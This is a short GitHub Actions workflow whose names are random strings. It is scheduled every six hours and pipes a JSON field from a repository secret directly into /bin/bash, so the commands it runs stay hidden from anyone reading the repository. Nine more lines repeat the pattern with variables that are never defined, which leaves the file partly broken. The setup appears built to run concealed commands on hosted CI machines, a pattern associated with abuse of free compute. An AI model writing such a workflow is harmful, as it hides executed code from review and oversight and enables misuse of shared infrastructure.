name: shiyongxing6715

on:
  workflow_dispatch:
  schedule:
    - cron: '15 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shiyongxing6715
        env:
          rnku19935: ${{ secrets.rnku19935 }}
        run: |
          echo $rnku19935 | jq -r .yrhxk1766 | /bin/bash
          echo $rjxuj93127 | jq -r .i6 | /bin/bash
          echo $fjmyo5491 | jq -r .py61 | /bin/bash
          echo $srhh4 | jq -r .b8962 | /bin/bash
          echo $w46 | jq -r .nfvf75069 | /bin/bash
          echo $h68659 | jq -r .ehwlr6476 | /bin/bash
          echo $omt1 | jq -r .nbjb39511 | /bin/bash
          echo $sqims02539 | jq -r .yz62 | /bin/bash
          echo $ga67 | jq -r .dv2680 | /bin/bash
          echo $u568 | jq -r .bck015 | /bin/bash

